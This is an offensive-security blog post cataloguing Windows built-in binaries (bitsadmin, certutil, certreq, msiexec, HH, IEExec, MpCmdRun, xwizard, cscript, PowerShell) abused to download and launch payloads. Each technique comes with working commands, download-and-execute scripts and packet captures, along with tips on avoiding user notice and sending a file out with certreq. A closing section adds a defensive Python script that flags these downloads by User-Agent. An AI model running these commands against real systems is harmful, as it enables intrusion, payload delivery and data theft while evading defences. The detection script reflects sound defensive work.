
Living Off The Land

2020-11-25
SteveDevin

Recently I have been working on a project to improve LOLBin ("whitelisted binary" abuse) techniques, so I am writing my notes down here.

Downloader

1. Bitsadmin.exe

bitsadmin /create myfile
bitsadmin /addfile myfile http://192.168.220.125/white_process/call_calc.exe c:\data\playfolder\notepad.exe
bitsadmin /SetNotifyCmdLine myfile c:\ADS\1.txt:cmd.exe NULL
bitsadmin /RESUME myfile

Alternatively, refer to Micro8's method:

bitsadmin /rawreturn /transfer down "http://192.168.1.115/robots.txt" E:\PDF\robots.txt

pcap

GET /white_process/call_calc.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Wed, 25 Nov 2020 16:46:48 GMT
Range: bytes=0-71744
User-Agent: Microsoft BITS/7.8
Host: 192.168.220.125

2. CertReq.exe

CertReq -Post -config https://example.org/ c:\windows\win.ini

pcap

POST /white_process/test HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/json
User-Agent: Mozilla/4.0 (compatible; Win32; NDES client 10.0.18362.1/19h1_release)
Content-Length: 167
Host: 192.168.220.125

Note: Small files only

Due to something going on with the internals of CertReq.exe only small (not sure on specific size limitations) files appear to work - otherwise you get the below error!

3. Certutil.exe

certutil.exe -urlcache -split -f http://192.168.220.125/white_process/test.msi

pcap

GET /white_process/test.msi HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: 192.168.220.125

Note: others have also seen the UA show up as CertUtil URL Agent.

4. Desktopimgdownldr.exe

desktopimgdownldr.exe /lockscreenurl:http://192.168.220.125/white_process/call_calc.exe /eventName:hello

pcap

GET /white_process/call_calc.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Wed, 25 Nov 2020 16:46:48 GMT
User-Agent: Microsoft BITS/7.8
Host: 192.168.220.125

Note 1: When used for its intended purpose, it downloads and saves images to the following default path:

C:\windows\Personalization\LockScreenImage\LockScreenImage_%random%.jpg

Note 2: The system uses BITS to download Windows updates and Microsoft Defender updates, among other things.

Tips

When running as Administrator, the binary sets and overrides the user’s lock screen image. However, as I show further below, by deleting the registry right after running the binary, the override can be avoided. In addition, desktopimgdownldr.exe does not change the image while the computer is in a locked screen, so an attacker can run it without the user noticing at all.

5. Msiexec.exe

msiexec /i http://192.168.220.125/white_process/test.msi

pcap

GET /white_process/test.msi HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Windows Installer
Host: 192.168.220.125

Note on which function Msiexec.exe calls: DllRegisterServer. When I first tried to reproduce this following Micro8's procedure I kept running into problems; later wsy pointed out that Msiexec calls the DLL's DllRegisterServer, whereas the DLL produced by Micro8's method only exports DllEntryPoint.

I later reversed the 32-bit msiexec.exe, and also confirmed this conclusion by successfully getting a shell via rundll32 Msiexec_rev_x64_4444.dll DllEntryPoint.

[Image: msiexec_re_register_dll]

6. HH

Open the target PowerShell script with HTML Help.

HH.exe http://192.168.220.125/white_process/call_calc.exe

pcap

GET /white_process/call_calc.exe HTTP/1.1
Accept: */*
Accept-Language: zh-CN
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: 192.168.220.125
Connection: Keep-Alive

Note: the downloaded file is opened directly after download; so far I have not found a parameter that hides this.

7. IEExec (Microsoft IE Execute shell)

Downloads and executes files from a remote server.

C:\Users\test\Desktop>c:\Windows\Microsoft.NET\Framework\v2.0.50727\IEExec.exe http://192.168.220.125/white_process/call_calc.exe

pcap

GET /white_process/call_calc.exe HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: 192.168.220.125
Connection: Keep-Alive

Note: IEExec lives in the .NET Framework directory, so you have to look for it.

8. MpCmdRun

"c:\Program Files\Windows Defender\MpCmdRun.exe" -DownloadFile -url http://192.168.220.125/white_progress/test -path c:\test.exe

Note

According to the reference below, MpCmdRun introduced the -DownloadFile parameter in version 4.18.2008.9. I do not have an environment with that version on hand; I only have a 4.18.2010.7 one, which does have this parameter.

However, in this version of Windows Defender, downloading through MpCmdRun is treated outright as dangerous behaviour; whether I whitelist the behaviour or turn off real-time protection, it simply reports a parameter error.

If this is the result of Microsoft closing the hole promptly, then its exploitable value and the situations where it applies are limited. For now I am leaving this as an open item (a bottomless pit) and will test again when I come across Windows Defender 4.18.2008.9.

[Image: Windows_defender-MpCmdRun]

9. Xwizard

C:\Users\test\Desktop>xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /z http://192.168.220.125/white_process/test.msi

pcap

GET /white_process/test.msi HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: 192.168.220.125
Connection: Keep-Alive

Note: the download succeeds, but running it reports "the client configuration file is invalid". Leaving this as an open item.

10. Cscript

' downfile.vbs, usage: cscript downfile.vbs <url> <output file>
set a=createobject("adod"+"b.stream")
set w=createobject("micro"+"soft.xmlhttp")
w.open "get",wsh.arguments(0),0
w.send
a.type=1
a.open
a.write w.responsebody
a.savetofile wsh.arguments(1),2

cscript downfile.vbs http://192.168.220.125/white_process/test test.txt

pcap

GET /white_process/test HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: 192.168.220.125
Connection: Keep-Alive

11. JS

// downfile.js, usage: cscript /nologo downfile.js <url>
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
WScript.Echo(WinHttpReq.ResponseText);

cscript /nologo downfile.js http://192.168.220.125/white_process/test.msi

pcap

GET /white_process/test.msi HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: 192.168.220.125

12. Powershell-wget/curl

Newer versions of PowerShell added curl/wget implementations, but the UA both of them send is still PowerShell's.

powershell /c wget http://xxxxxx.xxxx.xx
powershell /c curl http://xxxxxx.xxxx.xx

pcap

GET /white_process/call_calc.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; zh-CN) WindowsPowerShell/5.1.17763.316
Host: 192.168.220.125
Connection: Keep-Alive
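The captures in sections 1 to 12 all share one useful property for the defender: each built-in downloader announces itself through its User-Agent (Microsoft BITS, NDES client, Microsoft-CryptoAPI, Windows Installer, WinHttp.WinHttpRequest, WindowsPowerShell, or the generic MSIE 7.0 string of the WinINet hosts). The following Python script is an added example, not code from this post or from any of the tools it discusses: it parses a raw HTTP request head, maps the User-Agent to the binary family using fingerprints taken from the captures above, and rates the request by whether it targets an executable-looking path or a bare-IP host. The severity rules and the two control samples (a BITS update fetch and a browser request) are my own constructions, and the long UA strings are shortened.

```python
"""
Triage helper for HTTP request captures like the ones in this post: guess
which Windows built-in issued a download from its User-Agent, then rate how
much attention the request deserves.
"""
import re
from dataclasses import dataclass
from os.path import splitext
from typing import Optional

# User-Agent fingerprints taken from the captures above, first match wins.
# The last entry is the generic WinINet/urlmon string shared by hh.exe,
# IEExec.exe, xwizard.exe and MSXML-based scripts; on its own it also matches
# ordinary Internet Explorer traffic, so it only counts with other indicators.
UA_SIGNATURES = [
    (r"^Microsoft BITS/", "BITS (bitsadmin.exe / desktopimgdownldr.exe)"),
    (r"NDES client", "certreq.exe"),
    (r"^Microsoft-CryptoAPI/|^CertUtil URL Agent", "certutil.exe"),
    (r"^Windows Installer$", "msiexec.exe"),
    (r"WinHttp\.WinHttpRequest", "WinHttp COM client (cscript/wscript)"),
    (r"WindowsPowerShell/", "powershell.exe (wget/curl alias)"),
    (r"^Mozilla/4\.0 \(compatible; MSIE 7\.0;",
     "WinINet/urlmon host (hh.exe, IEExec.exe, xwizard.exe, MSXML script)"),
]

# Payload extensions that make a built-in downloader request worth escalating.
EXECUTABLE_EXT = {".exe", ".dll", ".msi", ".ps1", ".vbs", ".js", ".hta", ".scr"}


@dataclass
class Verdict:
    tool: Optional[str]       # matched downloader family, or None
    method: str
    host: str
    path: str
    raw_ip_host: bool         # Host header is a bare IP rather than a DNS name
    executable_payload: bool  # requested path ends in an executable extension
    severity: str             # "none", "low", "medium" or "high"


def parse_request(raw: str) -> dict:
    """Split a raw HTTP request head into method, path and a lower-cased header map."""
    lines = [l.strip() for l in raw.strip().splitlines() if l.strip()]
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers}


def classify(raw: str) -> Verdict:
    """Fingerprint one request head and assign a severity (rules are my own)."""
    req = parse_request(raw)
    ua = req["headers"].get("user-agent", "")
    host = req["headers"].get("host", "")
    tool = next((name for pat, name in UA_SIGNATURES if re.search(pat, ua)), None)
    raw_ip = re.fullmatch(r"\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?", host) is not None
    ext = splitext(req["path"].split("?", 1)[0])[1].lower()  # ignore query string
    executable = ext in EXECUTABLE_EXT

    if tool is None:
        severity = "none"      # not a known built-in downloader
    elif executable:
        severity = "high"      # built-in downloader fetching something runnable
    elif raw_ip:
        severity = "medium"    # built-in downloader talking to a bare IP address
    else:
        severity = "low"       # e.g. BITS pulling updates from a vendor host name
    return Verdict(tool, req["method"], host, req["path"], raw_ip, executable, severity)


def triage(captures: dict) -> list:
    """Return (name, severity, tool) for every capture, most severe first."""
    order = {"high": 0, "medium": 1, "low": 2, "none": 3}
    results = []
    for name, raw in captures.items():
        v = classify(raw)
        results.append((name, v.severity, v.tool))
    return sorted(results, key=lambda r: order[r[1]])


# Request heads copied (and shortened) from the captures in this post, plus two
# constructed controls: a BITS update fetch and an ordinary browser request.
SAMPLES = {
    "bitsadmin": """GET /white_process/call_calc.exe HTTP/1.1
User-Agent: Microsoft BITS/7.8
Host: 192.168.220.125""",
    "certreq": """POST /white_process/test HTTP/1.1
Content-Type: application/json
User-Agent: Mozilla/4.0 (compatible; Win32; NDES client 10.0.18362.1/19h1_release)
Host: 192.168.220.125""",
    "certutil": """GET /white_process/test.msi HTTP/1.1
User-Agent: Microsoft-CryptoAPI/10.0
Host: 192.168.220.125""",
    "cscript_vbs": """GET /white_process/test HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0)
Host: 192.168.220.125""",
    "powershell": """GET /white_process/call_calc.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; zh-CN) WindowsPowerShell/5.1.17763.316
Host: 192.168.220.125""",
    "bits_update (constructed)": """GET /msdownload/update/example.psf HTTP/1.1
User-Agent: Microsoft BITS/7.8
Host: download.windowsupdate.com""",
    "browser (constructed)": """GET /index.html HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/87.0
Host: intranet.example""",
}

if __name__ == "__main__":
    for name, severity, tool in triage(SAMPLES):
        print(f"{severity:6} {name:28} {tool}")
```

The point of the severity ladder is that the User-Agent alone is not a verdict: BITS and CryptoAPI fetch legitimate updates and CRLs all day, so the same fingerprint drops to "low" against a vendor host name and rises to "high" only when the path ends in something runnable. In a real pipeline the host check would be replaced by an allow-list of expected update and PKI endpoints.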

Reference

downloader

certreq

certutil

Msiexec

desktopimgdownldr

MpCmdRun
